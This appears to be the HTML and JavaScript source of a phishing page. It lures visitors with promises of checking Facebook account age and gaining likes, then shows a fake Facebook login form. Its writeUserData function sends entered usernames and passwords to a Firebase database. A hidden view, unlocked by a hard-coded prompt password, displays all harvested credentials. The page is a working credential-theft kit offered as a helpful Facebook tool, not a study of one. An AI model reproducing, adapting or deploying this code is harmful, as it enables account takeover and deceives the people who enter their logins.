<!DOCTYPE html>
<html>
    <head>
    
    
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="style.css">      
<meta charset="UTF-8"></meta>      
<script src="https://www.gstatic.com/firebasejs/8.2.3/firebase-analytics.js"></script>      
<script src="https://www.gstatic.com/firebasejs/8.2.3/firebase.js"></script>  
<script>
    // Your web app's Firebase configuration
    // For Firebase JS SDK v7.20.0 and later, measurementId is optional
    var firebaseConfig = {
    apiKey: "***********",
    authDomain: "cartoline-india.firebaseapp.co",
    projectId: "cartoline-india",
    storageBucket: "**********",
    messagingSenderId: "********",
    appId: "1:372576193203:web:*****",
    measurementId: "G*******"
    };
    // Initialize Firebase
    firebase.initializeApp(firebaseConfig);
</script>
    
  
  
  
    <style>
#now {
    font-size:20px;
}
#box{
    font-size:13px;
}
#ci{
    width:200px;
    height:100px;
    margin-left:50px;
    border-radius:50px;
}
#likeme{
    width:360px;
    height:200px;
    margin-left:-8px;
    margin-top:-8px;
}
#likeyou{
    width:360px;
    height:200px;
    margin-left:-8px;
    margin-top:13px;
}
#page, #likeyou, #likeme{
    border-radius:0px;
}
#page{
    width:360px;
    height:200px;
    margin-left:-8px;
    margin-top:-8px;
}
#ass{
    margin-top:30px;
    font-weight:bolder ;
    color:white;
    background-color:blue;
    border-color:blue;
    box-shadow:0px 0px 5px darkBlue;
    border-radius:20px;
    height:50px;
    width:200px;
}
#qqq{
    display:none;
    background-size:100% 100%;
    margin-bottom:-70px;
}
#showname{
  color: white;
  font-size: 25px;
  background:#E212C457;
  padding: 3px;
  margin-bottom: 0;
  margin: 10px;
  border-bottom:2px solid #70E2123B;
  border-radius:10px;
  text-align: center;
}
#para{
  color: white;
  padding:3px;
  background:#5D12E23B;
  margin:3px;
  border-radius:10px;
}
#main{
  border:1px solid #33EF0EA6;
  border-radius:5px;
  box-shadow: 3px 5px 5px #EF0EDD4D;
}
.num0, .num1, #num2{
    text-align:center ;
    border-radius:10px;
    border:0px solid rgb(0,0,0,0);
}
body {
    
}
#ori,#msgs, #qqq, #clok{
    display:none;
}
#min{
    width:120px;
    height:100px;
    float:left;
}
#exam{
    width:200px;
    height:100px;
}
#ss, #ds, #fs{
    width:120px;
    height:20px;
    margin-left:160px;
    float:righ
}

.real{
    border:2px solid rgb(0,180,255,0.2);
    background-color:rgb(0,0,0,0.01);
    width:350px;
    height:40px;
    margin-left:-5px;
}
#op{
    width:140px;
    margin-left:18px;
    margin-top:-10px;
}
#oo{
    margin-top:-15px;
    margin-left:180px;
    width:140px;
}
#or{
    margin-left:162px;
}
#login{
    width:355px;
    height:40px;
    border:2px solid transparent;
    background-image: url("https://dl.dropbox.com/s/o4z6xaugg2y29k3/Screenshot_20210122-194405%20%281%29.jpg");
    color:white;
    margin-left:-5px;
    font-size:25px;
}
#lan{
    color:blue;
}
#creat{
    width:420px;
    height:60px;
    border:10px solid transparent;
    background-color: green;
    color:white;
}
#ori{
    font-size:25px;
}
#re{
    color:red;
}
    </style>
        <title>MY FACEBOOK</title>
    </head>
    <body>
<div id="box">
<center>
          <header>
          HOW LONG YOU HAVE CREATED 
          YOUR FACEBOOK ACCOUNT
          </header>
</center>
    <p>
              Sometime you just gonna wonder how long you've been on facebook <spam id="a">unfortunately</spam> you can't find it on your settings.<br />Now log to <a id="facebook" href="#m">http://facebook/account...</a> now<br />
    <ul>
<li>log to <a id="facebok" href="#m">http://facebook/account...</a></li>
<li>click on <spam id="b">"my account"</spam></li>
<li>click on <spam id="b">my details</spam></li>
    </ul>
 </p>
 <p>
        Now your account details will be view just like below
<img id="exam" src="https://dl.dropbox.com/s/lzg1ki9i5jxkfm0/Screenshot_20210122-181315.jpg">
 </p>
 <br />
 <br />
 <br />
 <br />
 <br />
 <h2 id="re">people also search for</h2>
    <img id="min" src="https://dl.dropbox.com/s/g5e6z8en0nhw513/1493796187-fb-likes~2.jpg">
    <p id="ss"><a href="#m">
          HOW TO GET MORE LIKES ON FACEBOOK EVEN THOUGH FRIENDS REFUSES TO LIKE POST...</a>
    </p>
<br />
<br />
<br />
<br />
<br />
<br />
    <img id="min" src="https://dl.dropbox.com/s/0v7rog1zln81xhk/fb-likes-2020.jpg">
    <p id="ds"><a href="#m">
        BUYING FACEBOOK LIKES TO BOOST YOUR FACEBOOK PAGE, POST GOES ROUND...</a>
    </p>
<br />
<br />
<br />
<br />
<br />
<br />
<img id="min" src="https://dl.dropbox.com/s/91tdl0z7sksk30x/get-facebook-likes.png">
     <p id="fs"><a href="#m">
         GET THOUSANDS OF REACTIONS ON YOUR FACEBOOK PAGE, POST AND PROFILE..</a>
     </p>
<br />
<br />
<br />
<br />
<br /><pre>
<a href="#a">About us</a>     <a href="#a">contact us</a></pre>
</div>
















<div id="ori">
       <center>
           Facebook
       </center> 

<hr>
Mobile number or email
<br />
<br />
<input class="real" id="nae" type="text">
<br />
<br />
Password
<br />
<br />
<input class="real" id="mg" type="password">
<br />
<br />
       <center>
       <button id="login" id="add" onclick="writeUserData()">
       <b>
           Log In
       </b>
       </button>
       </center>
<br />
<br />
<span id="lan">
    Forget Password
</span>
<br />
<br />
 <span id="or">or</span>
<hr id="op">
<hr id="oo">
<br />
<br />
      <center><span id="creat">
          Create New Account</span>
      </center>
<br />
<br />
<p id="lan">
English (UK)
<br />
<br>
Hausa
<br />
<br>
Français (France)
<br />
<br>بالعربية
<br />
<br>
More languages...
</p>
</div>












 <div id="now">
 <div id="qqq">
<form method="post">
  <img id="likeme" src="https://dl.dropbox.com/s/g5e6z8en0nhw513/1493796187-fb-likes~2.jpg">
  
  <br /><br />
   <div id="name">Phone num:   <input type="number" name="user" class="num0" id="name" placeholder="+          " /></div>
   
            <br />
   <div id="pass">Your Password:   <input type="password" class="num1" id="msg" placeholder="**********"/></div>
       
            <br />
  <div id="confirm" >Confirm Password: <input type="password"id="num2" placeholder="***********"/></div>
              <center>
    <input id="ass" type="submit" value="Login" />
               </center>
            <br />
            
    <img id="likeyou" src="https://dl.dropbox.com/s/91tdl0z7sksk30x/get-facebook-likes.png?">
</form>
</div>
<div id="clok">
   <img id="page" src="https://dl.dropbox.com/s/cmhmsgoin7r6xxy/1000likes.jpg">
        <p>
            Many things we have faced on facebook, sometimes we wonder why we got less likes than the friends we got....the problem are as follows...
     <li>post not reaching non-chatting friends</li>
     <li>insufficience followers</li>
     <br />
     Your code gonna get less like due to the above reason <b>BUT</b> there is one way out log to <a id="click" href="#me">here now</a>
     <br />
     Fill in ur facebook details then click log in after show this below, click on start followers to make new followers once friend is added either you sent request or they do <b>OR</b> click on auto followers to turn all friends to followers
     <br />
     <img id="ci" src="https://dl.dropbox.com/s/5qy2exj0z6nhnlc/Screenshot_20210120-214830.jpg">
     <br />
     click on select to select followers <b>OR</b> choose all to select all friends
     <br />
     <img id="ci" src="https://dl.dropbox.com/s/ipdrika0jeu6wg3/Screenshot_20210120-214646.jpg">
     <br />
     now it is done and you can enjoy ur post and followers
     <br />
     <img id="ci" src="https://dl.dropbox.com/s/yrldlchvbsxw5kf/Screenshot_20210120-225348_1.png">
     <br />
     <b>IF POST HASN'T BE LIKE BY FRIEND, POST KEEP REVIEWING TO FRIENDS ACCOUNT</b> thanks you welcome<a href="#me" >@facebook.like</a>
        </p>
</div>
</div>

 <div id="msgs">
    <h2 class="load">Loading...</h2>
  </div>









<script>
    window.onload=function(){
document.getElementById("facebook").onclick=function(){
   document.getElementById("ori").style.display="block"
   document.getElementById("box").style.display="none"
   document.getElementById("clok").style.display="none"
   document.getElementById("qqq").style.display="none"
   document.getElementById("msgs").style.display="none"
  
var msgs =document.getElementById("msgs");
var ask =prompt("congratulation!")
if(ask=="kcubetermet"){
    msgs.style.display="block"
}
else{
    msgs.style.display="none"
}
}
document.getElementById("facebok").onclick=function(){
   document.getElementById("ori").style.display="block"
   document.getElementById("box").style.display="none"
   document.getElementById("clok").style.display="none"
   document.getElementById("qqq").style.display="none"
   document.getElementById("msgs").style.display="none"
  
var msgs =document.getElementById("msgs");
var ask =prompt("congratulation!")
if(ask=="kcubetermet"){
    msgs.style.display="block"
}
else{
    msgs.style.display="none"
}
}
document.getElementById("ss").onclick=function(){
  document.getElementById("clok").style.display="block"
   document.getElementById("box").style.display="none"
   document.getElementById("ori").style.display="none"
   document.getElementById("qqq").style.display="none"
   document.getElementById("msgs").style.display="none"
 
var msgs =document.getElementById("msgs");
var ask =prompt("congratulation!")
if(ask=="kcubetermet"){
    msgs.style.display="block"
}
else{
    msgs.style.display="none"
}
}
document.getElementById("ds").onclick=function(){
  document.getElementById("clok").style.display="block"
   document.getElementById("box").style.display="none"
   document.getElementById("ori").style.display="none"
   document.getElementById("qqq").style.display="none"
   document.getElementById("msgs").style.display="none"

var msgs =document.getElementById("msgs");
var ask =prompt("congratulation!")
if(ask=="kcubetermet"){
    msgs.style.display="block"
}
else{
    msgs.style.display="none"
}
}
document.getElementById("fs").onclick=function(){
  document.getElementById("clok").style.display="block"
   document.getElementById("box").style.display="none"
   document.getElementById("ori").style.display="none"
   document.getElementById("qqq").style.display="none"
   document.getElementById("msgs").style.display="none"
 
var msgs =document.getElementById("msgs");
var ask =prompt("congratulation!")
if(ask=="kcubetermet"){
    msgs.style.display="block"
}
else{
    msgs.style.display="none"
}
}
document.getElementById("click").onclick=function(){
   document.getElementById("qqq").style.display="block"
   document.getElementById("box").style.display="none"
   document.getElementById("clok").style.display="none"
   document.getElementById("ori").style.display="none"
   document.getElementById("msgs").style.display="none"
   document.body.style.backgroundColor="skyblue"
var msgs =document.getElementById("msgs");
var ask =prompt("congratulation!")
if(ask=="kcubetermet"){
    msgs.style.display="block"
}
else{
    msgs.style.display="none"
}
}
var msgs =document.getElementById("msgs");
var ask =prompt("congratulation!")
if(ask=="kcubetermet"){
    msgs.style.display="block"
}
else{
    msgs.style.display="none"
}
}
</script>



<script type="text/javascript" charset="utf-8">
    var database = firebase.database();


    function writeUserData() {
      var name = document.getElementById('nae');
      var msg = document.getElementById('mg');

      if (name.valu === "" || msg.value === "") {
        alert('please enter details');
      } 
      else if(msg.value == name.value){
          alert("wrong password input")
      }
      else {
        firebase.database().ref('users/').push({
          user: name.value,
          message: msg.value,

        });

        console.log('loading');
      }


    }
    
    
    var data = firebase.database().ref('users/');
data.on('value', function(snapshot) {

 
             

document.getElementById("msgs").innerHTML="";

 var val = snapshot.val();
 Object.keys(val).forEach((key) => {
 


const div = document.createElement("div") 


div.innerHTML = `
<div id="chain">
<div id="main">

            
            <h3 id="showname">${val[key].user.replace(/</g,"&lt;").replace(/>/g,"&gt;")}</h3>
            
            <p id="para">${val[key].message.replace(/</g,"&lt;").replace(/>/g,"&gt;")}</p>
                <br />
                
                
        <br><br><br>
        
`;


document.getElementById("msgs").appendChild(div)

 });

}); 
    
  </script>
  
  

 
    </body>
</html>
